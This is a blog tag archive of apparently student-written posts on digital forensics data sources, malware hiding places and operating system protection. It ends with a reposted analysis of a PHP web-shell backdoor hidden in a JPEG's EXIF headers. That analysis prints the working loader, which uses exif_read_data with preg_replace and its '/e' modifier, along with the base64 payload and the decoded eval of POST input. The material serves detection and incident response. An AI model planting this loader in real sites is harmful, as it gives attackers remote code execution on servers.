Tag Archives: Malware

Digital Forensics Comparison of Data Source Relevance per Investigations

Digital Forensics Comparison of Data Source Relevance

Many different sciences are grounded in the fact that certain information will never change.  For instance, gravity never changes, water molecules can be a liquid, solid, and a gas, and DNA can help match identity in human beings.  In digital forensic this is different because the medium in which they work is technology and technology changes all the time.  Keeping up on the latest in technological advances and their data sources which are common places to get specific information can be the difference between winning and losing a case.  Knowing where to look and in which order can change based on the type of investigation that a digital forensic investigator is working on.  We will look at the collection and examination of data sources based on the more common investigation that have been seen.

Network Intrusion Investigation

Network intrusions are a continual problem and will be for some time.  There won’t be a shortage of network intrusion investigations happening anytime soon.  (Fung 2013) says, “The Pentagon reports getting 10 million attempts a day.”  Which is scary and incredible statistic on its own.  But this isn’t just at the government agency level.  BP the energy company has been experiencing 50,000 attempts of cyber intrusion per day, (Fung 2013). In a recent report from Verizon not only are network intrusions steadily moving up, but it shows the time to compromise decreasing, (Verizon, 2016, p. xx).  This puts a large amount of pressure on the digital forensics community to speed their time for discovery.

Some of the different types of data that would need to be collected in a network intrusion investigation would be:

  • IDS and Firewall logs
  • HTTP, FTP, SMTP logs
  • Network Applications logs
  • Backtracking Transmission with TCP connections
  • Artifacts and remnants of network traffic on hard drives of seized systems
  • Live traffic captured by packet sniffer
  • Individual systems ARP tables, SNMP messages

Collection

Collecting data from these different areas are more challenging than other data in other areas of the system.  The data given will differ in all investigation but the object is to find any time of consistency in network intrusion investigations.  Many of the network intrusion investigations deal with network state.  Discovering the network state allows forensic experts to find possible entry points.  One of the first things that needs to be done is painting a picture of the network configuration.  Knowing a blue print of external facing applications and or api’s.  A beneficial tool in this scenario will be the ability to create an accurate timeline of events.  So, the number one priority of this investigation would be obtaining system and application logs.  This will allow a forensic expert to formulate a timeline. In Table 1 we can see that there are numerous types of data sources to pull data from.  However, the internal network and system logs which include Firewall, IDS, and Active Directory logs proves the most viable data sources to look for in this specific type of investigation.  There is also a very high probability of collection since most of the information is obtained by taking a snapshot of the logs from a cooperative network administrator.

Table 1. Shows the different data sources in a network intrusion investigation

In a network intrusion investigation, a forensic expert wants visibility at the packet level.  Both in bound and out bound.  The below prioritization of data sources is as follow:

  1. Internal Network System Logs
  2. ISP Service Logs
  3. Computer and or server hard drives

Examination

Examining the data that was found is a separate story.  Internal logs will contain the information that a forensic expert needs to build the important event timeline, however there will be could be large amount of data to examine.  Thanks to tools like encase this becomes slightly easier for the forensic expert.  This is where IDS systems play a huge role.  Intrusion Detection Systems can capture anomaly based events or statistical based events.  These will be flagged by an alert.  Focusing on the alerts that were presented can give a great starting point in the examination of a network intrusion investigation.  This is not the end all be all data source to look at in a network intrusion investigation in fact many things could change the type of data that a forensic expert gets back.  (Forensic Mag, 2013) says “any number of activities or events might influence or affect the collected data in unknown ways, including TCP relaying, proxy servers, complex packet routing, Web and e-mail anonymizers, Internet Protocol (IP) address or e-mail spoofing, compromised third party systems, session hijacking and other person-in-the-middle attacks, and domain name system (DNS) poisoning.”  Also, if there is a sophisticated network intrusion logs have the potential in being deleted or cleared.  The examination of the internal network logs is invaluable in this type of investigation.

ISP server logs also pose a great data source primarily because they can give you a general location of where the network intrusion came from.  Ultimately leading to an arrest.  Obtaining this session data can be done by obtaining a warrant for a specific customer.  This will give a forensic expert all pertinent data that an ISP has to a specific investigation, (Forensic Mag, 2013).

Malware Intrusion Investigation

Malware intrusion investigations include but not limited to worms, Trojans, botnets, rootkits and ransomware.  Malware is a huge problem in the United States and abroad.  (Panda Labs, 2016) says, “18 million new malware samples were captured in this quarter alone, an average of 200,000 each day.”  As seen below in Figure 1.  The most unbelievable part of this statistic is that this is based on just one quarter.  Malware investigations are on the rise.  Understanding how malware enters a computer and how it communicates gives the forensic expert a huge advantage in locating the exact places on a compromise system to look.  Which in turn increases the efficiency of the investigation.

Figure 1. Malware identified over the years.

Collection

Malware investigations unlike the network intrusion investigation predominantly looks at the malware itself.  Understanding how the malware was introduce may lead to a conviction.  Understand the level of complexity, damage and data leakage will be found on the hard drive of the infected computer or server itself.  More importantly at the RAM level.  As a matter of fact, (SANS Digital Forensics and Incident Response Blog, 2016), says “Investigators who do not look at volatile memory are leaving evidence at the crime scene.” Much like the data collected for the network intrusion investigation forensic experts need to understand a basic knowledge of what the operating system considers normal behavior.  For this network, golden images and IDS solutions may help identify normal behavior.  But the volatile memory on disk will be the number one for this type of investigation.  (SANS Digital Forensics and Incident Response Blog, 2016), continues by saying “It is this evidence that often proves to be the smoking gun that unravels the story of what happened on a system.”

Table 2. Depicts the order of data sources in a Malware installation investigation.

 

Examination

The examination of the volatile memory on the compromised computer or server will yield user actions, as well as evil processes and furtive behaviors implemented by malicious code, (SANS Digital Forensics and Incident Response Blog, 2016).  As RAM, would be the top data source that a forensic expert would be looking at, the Registry if this is a windows machine would also be of interest.  Time zone information, audit policy, wireless SSIDs, locations of auto-start programs, user activities and mounted devices can all be obtained from the windows registry, (Nelson, Phillips, & Steuart, 2010, p. xx).  As demonstrated in figure 2 below.  In figure 3 there is usb device information that can be obtain from the registry.  This would all be valuable information when studying if the malware moved from computer to computer on the internal network and it behaves in general.  Also, studying network logs to see if the malware is communicating with an external server would also be a data source to examine.  The prioritized list of all of the data sources for the malware installation investigation would like as followed:

  1. Computer / Server HD
  2. Internal Network System Logs
  3. ISP Server Logs

Figure 2. Shows the history obtained from a Windows 7 registry.

Figure 3. Depicts a registry value where USB device that was plugged into the computer

 

Figure 4. Shows the created date and last access date of a wireless network

 

Insider File Deletion Investigation

One of the biggest threats to a business is the insider threat. Insiders include anyone authorized beyond the authority of the public.  (Cohen, 2012, p. xx) says, “Specifically, 76% of disloyal insiders were identified after being caught to have taken steps to conceal their identities, actions, or both, 60% compromised another’s user’s account to carry out their acts, and 88% involved either modification or deletion of information.”  This includes a disgruntled employee that has possibly turned or a possible hired employee planted in the company working on behalf of another company.  One of the main reasons that this is such a difficult threat to detect is largely because the employee is given regular access to a company’s network.  Which allows for them to know where sensitive data is kept.

Collection

In this insider deletion investigation access to an offender’s hard drive of their computer would be a great first step.  Collection of this would more than likely show nothing since the insider more than likely would try and cover his or her tracks.  But using the person’s hard drive would give a forensics expert the ability to see if there are more devices that need to be considered in the investigation such as removable devices and remote storage.  In the event of file deletion, access to the computers that the data was deleted from can tell information about what account deleted the file.  (Cohen, 2012, p. xx) continues by saying, “While it is possible that an insider might use known malicious attack methods typically detected by intrusion detection methodologies and system, doing things that trigger such systems is rarely if ever necessary for an authorized insider.”  So as the network and system logs still might prove useful this would be very difficult to identify.

Figure 4. Shows Active directory of a user and his/her last login.

Examination

The data that will be gained from the registry of the insider’s computer HD registry would be the best starting point here.  Allowing a forensic expert to gauging a since of normal computer usage and seeing if there are any anomalies.  Using the data from the network active directory that controls the user accounts for the entire company would allow forensic experts to pin point the account that was used in the deletion.  In an examination combining the physical sensors, key card access, and account access from system logs proves to be invaluable.  In figure 4 above there is useful information that can be gotten from Active directory as well.  Examiner use this to combine this data together to understand consistencies and inconsistencies.  This could also give a forensic expert an approximate time of when this happened allow the examiner to build a potential timeline for the investigation.  As seen below in table 3 the starting point would be the compromised files on the hard drive of the given computer or server.

Table 3.  Data sources ranking in an insider deletion investigation

Conclusion

As we can see there are many different areas where a forensic expert can look for data.  As technology continues to advance these numbers will grow.  The amount of time that it takes to compromise a system versus the amount of time it takes to discover is still very far apart.  Which leads to the ultimate consensus in my findings that to be the forensic investigator on anyone of these investigations one would have to look everywhere.  Having a general understanding of the crime does help in many scenarios but not all.  When certain security measures aren’t put into place there is little an examination can do specifically in the insider threat scenario.  The forensic examination is only as good as the carelessness of the insider and the security that was in place at the time.  Having general guidelines, a clear understanding of the investigation, and a priority list of known data source places can go a very long way.

References

National Institute of Justice (U.S.). (2004). Special report, forensic examination of digital evidence: a guide for law enforcement (199408). Retrieved from publisher not identified website: https://www.ncjrs.gov/pdffiles1/nij/199408.pdf

National Institute of Justice (U.S.). (2007). Report, investigations involving the internet and computer networks. Retrieved from website: https://www.ncjrs.gov/pdffiles1/nij/210798.pdf

SANS Digital Forensics and Incident Response Blog. (2016, October 29). Digital forensics and incident response blog | malware can hide, but it must run. Retrieved from https://digital-forensics.sans.org/blog/2016/10/29/malware-can-hide-but-it-must-run/

Cohen, F. (2012). Forensic methods for detecting insider turning behaviors. 2012 IEEE Symposium on Security and Privacy Workshops. doi:10.1109/spw.2012.21

Forensic Mag. (2013, May 28). The case for teaching network protocols to computer forensics examiners: part 1. Retrieved from http://www.forensicmag.com/article/2013/05/case-teaching-network-protocols-computer-forensics-examiners-part-1

Fung, B. (2013, March 8). How many cyberattacks hit the united states last year? Retrieved from http://www.nextgov.com/cybersecurity/2013/03/how-many-cyberattacks-hit-united-states-last-year/61775/

Panda Labs. (2016, October 20). Cybercrime reaches new heights in the third quarter. Retrieved from http://www.pandasecurity.com/mediacenter/pandalabs/pandalabs-q3/

Shephard, D. (2015, March 16). 84 fascinating & scary it security statistics. Retrieved from https://www.netiq.com/communities/cool-solutions/netiq-views/84-fascinating-it-security-statistics/

Verizon. (2016). 2016 data breach investigations report. Author.

 

Top Places for Malware to hide 2017

With most of the commercial anti-virus software vendors using signature based malware classification methods this becomes a bit of a game of creating code that is obfuscated just enough to change the signature to be undetected.  (Shijo & Salim, 2015, p. xx) say, “In static analysis features are extracted from the binary code of programs and are used to create models describing them.”  This is the most commonly used method of detection and obfuscation is the simple work around. Signatures need to be frequently updated to catch the common malware, while malware makers can simply change the obfuscation of the code.  One never catches up with the other. (Shijo & Salim, 2015, p. xx) continues by saying, “The static analysis fails at different code obfuscation techniques used by the virus coders and also at polymorphic and metamorphic malware’s.”  What also fails is the dynamic analysis due to the behavior of a program that is monitored while in execution.  The problem is malware has to be done in a secure environment for a specific amount of time this is a limitation due to the amount of time that it takes to create this maleware.

The first way that malware tries to hide itself is in the windows registry.(AlienVault, 2016) says, “the Windows registry is quite large and complex, which means there many places where malware can insert itself to achieve persistence.” An simple example is the Poweliks sets a null entry utilizing one of the built-in Windows APIs, ZwSetValueKey, which allows it to create a registry key with an encoded data blob, (AlienVault, 2016).  From this point it can hide out and autostart and maintain persistence of many systems.

The second way malware will hide itself is process injection.  This is where the malware hijacks a running process and puts bits of code into it.  (AlienVault, 2016) says, “Malware leverages process injection techniques to hide code execution and avoid detection by utilizing known “good” processes such as svchost.exe or explorer.exe.”

A third example would be physical.  This is where the malware could possibly be stored on the slack partition of the drive.  (Berghel, 2007, p. xx)  says, ” At the sector level, any unused part of a partially filled sector is padded with either data from memory (RAM slack) or null characters (sector slack).”  The location is ideal because the Operating System doesn’t have access to this portion of the data normally.  This can lay dormant and resurface based off of specific commands.

References

AlienVault. (2016, October 3). Malware hiding techniques to watch for: alienvault labs. Retrieved from https://www.alienvault.com/blogs/labs-research/malware-hiding-techniques-to-watch-for-alienvault-labs

Shijo, P., & Salim, A. (2015). Integrated static and dynamic analysis for malware detection. Procedia Computer Science46, 804-811. doi:10.1016/j.procs.2015.02.149

Berghel, H. (2007). Hiding Data, Forensics, and Anti-Forensics. Communications Of The ACM50(4), 15-20. doi:10.1145/1232743.1232761

Operating System Protection

 

Operating System Protection

With the ever changing landscape of potential operating system risks the challenge to secure any one computer becomes more and more difficult.  Operating systems have gone through an enormous change in recent years as the operating system isn’t highly dependent on installed software. The evolution of the browser has given users the ability to access large resources on other computers more readily in day to day usage via multiple API calls.  With these malicious API calls the need for more protection at this level is becoming more critical.  With the dominant website vulnerabilities being Injection, Broken Authentication, and Cross-site scripting the ability to secure an operating system has to be solved with a sophisticated solution.  There have been many different solutions to try and tackle the multiple issues with viruses and malware infecting computers.  Some of the best solutions to this heavily debated problem are Microkernel Kernel OS, Trusted Platform Module, and user based protection.

When examining creation of secure operating systems, one has to take into account the Microkernel Kernel secure OS’s, we can see how this is an ever evolving solution.  From projects such as the IBOS, Illinois Browser Operating System to the secure microkernel project (sel4).  The theory of microkernels according to (CSIRO, n.d.) says,” a bigger system has inherently more bugs than a small system.”  Taking into account for every thousand lines of code there are an average amount of bugs that can be introduced. The kernel is always apart of the trusted computing base and minimizing this allows for a smaller TCB which is a smaller kernel. Which leaves for a more secure operating system.  Another noteworthy advantage of using Micro kernel operating systems is there potential in solving the availability component of the CIA triad.  If a service fails other services will be able to work without crashing also, (Abualrob, 2012).  The downside to the secure OS or microkernel is the performance loss.  Because every request needs to go through the kernel the system would make exponentially more calls than a monolithic kernel based OS.

Another solution to the security issues that operating systems face is Trusted Platform Module or TPM.  TPM is actually a chip that was created by the TCG group, which is made up of industry leaders. (Kleyman, n.d.) states, “The TPM contains several Platform Configuration Registers (PCRs) that allow secure storage and reporting of security-relevant data (unauthorized changes to the BIOS, possible root-based modifications, boot-sector changes, etc).” The ability to have vendors collect data about OS behavior based on possible harmful changes can greatly decrease unsecure practices.  However, this is also the disadvantage of the TPM chip as many users are weary of how the vendor may use this information and its somewhat invasion of privacy.  TPM if implement is best implemented with other layers of security this isn’t a standalone solution.

Users have seen many changes in protection in OS’s. Many solutions dare stand the test of time.  One of these solutions that has still been around is antivirus based protection.  Which when done correctly offers many benefits.  Antivirus software that scans a computer has been around for quite some time and was the go to method for operating system level security for years.  Its benefits are the ability to prevent known virus’s and malware based off of a signature that is known.  If there is a known virus in the wild and a security professional has alerted the necessary vendors, then another user will share that knowledge and be prevented from the same attacks.  Granted that users are continually updating their antivirus software definitions.  Disadvantages to using this method alone to secure an operating system are customization of attacks. Attackers have evolved with the security methods.  If an attack isn’t known or in the definitions database, it won’t be stopped.

User based protection is a great method of making sure that a non-privileged user cannot execute code against critical parts of an operating system.  A perfect example of this would be in Windows OS using the UAC or user access controls.  The benefit is that a user of the operating system will be notified when a significant change to the operating system is about to occur.  The user would then need to allow this function to continue.  As this is a great way of being able to hand pick which applications are allowed to modify parts of the OS, the concepts start to breakdown when understanding modern computer usage.  The amount of calls that are being made to modify critical parts of the operating system are very high.  The notifications decrease the usage of the operating system.  Also educating users to be able to understand what’s a good modification and what is a bad modification becomes quite a challenge.

As all approaches to secure operating system take a unique look at what the user will use the OS for.  The implementation of many of these are very unrealistic and corporate environments.  However, with ease of implementation the approach needs to be on Hybrid Kernel approach.  This approach instead of loading the whole thing into memory, core modules are loaded dynamically to memory on demand. One disadvantage is that a module may destabilize a running kernel.

 

  1. Hybrid Kernel with performance being easier then MicroKernel or Monolithic by themselves if you could deal with it would be the most secure.
  2. TPM chip in conjunction with other security measures if you trust vendors.
  3. Trusted Computing Antivirus software file protection with its ease of implementation and great track record.

 

References

Abualrob, M. (2012, November 17). Microkernel vs. Monolithic os architectures. Retrieved from www.8bitavenue.com/2012/11/microkernel-vs-monolithic-os-architectures/

Anderson, R. (2008). Security engineering – A guide to building dependable distributed systems(2nd ed.). New York, NY: John Wiley & Sons Publishing, Inc.

Beuchelt, G. (2013). Computer and information security handbook. Boston, MA: Morgan Kaufmann Publishers.

CSIRO. (n.d.). sel4 secure embedded l4 ssrg | data 61. Retrieved from http://ssrg.nicta.com.au/projects/seL4/

Kleyman, B. (n.d.). Weighing the pros and cons of the trusted computing platform. Retrieved from http://searchitoperations.techtarget.com/tip/Weighing-the-pros-and-cons-of-the-Trusted-Computing-Platform

 

Checkout the malware in a JPEG

A few days ago, Peter Gramantik from our research team found a very interesting backdoor on a compromised site. This backdoor didn’t rely on the normal patterns to hide its content (like base64/gzip encoding), but stored its data in the EXIF headers of a JPEG image. It also used the exif_read_data and preg_replace PHP functions to read the headers and execute itself.

Technical Details

The backdoor is divided into two parts. The first part is a mix of the exif_read_data function to read the image headers and the preg_replace function to execute the content. This is what we found in the compromised site:

$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');
preg_replace($exif['Make'],$exif['Model'],'');


Both functions are harmless by themselves. Exif_read_data is commonly used to read images and preg_replace to replace the content of strings. However, preg_replace has a hidden and tricky option where if you pass the “/e” modifier it will execute the content (eval), instead of just searching/replacing.

When we look at the bun.jpg file, we find the second part of the backdoor:

ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@
^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^

The file starts normally with the common headers, but in the “Make” header it has a strange keyword: “/.*/e”. That’s the exact modifier used by preg_replace to execute (eval) whatever is passed to it.

Now things are getting interesting…

If we keep looking at the EXIF data, we can see the “eval ( base64_decode” hidden inside the “Model” header. When you put it all together, we can see what is going on. The attackers are reading both the Maker and Model header from the EXIF and filling the preg_replace with them. Once we modify the $exif[‘Make’] and $exif[‘Model’] for what is in the file, we get the final backdoor:

preg_replace ("/.*/e", ,"@ eval ( base64_decode("aWYgKGl ...");

Once decoded, we can see that it just executes whatever content is provided by the POST variable zz1. The full decoded backdoor is here:

if (isset( $_POST["zz1"])) { eval (stripslashes( $_POST["zz1"]..
Steganography Malware

Another interesting point is that bun.jpg and other images that were compromised, still load and work properly. In fact, on these compromised sites, the attackers modified a legit, pre-existent image from the site. This is a curious steganographic way to hide the malware.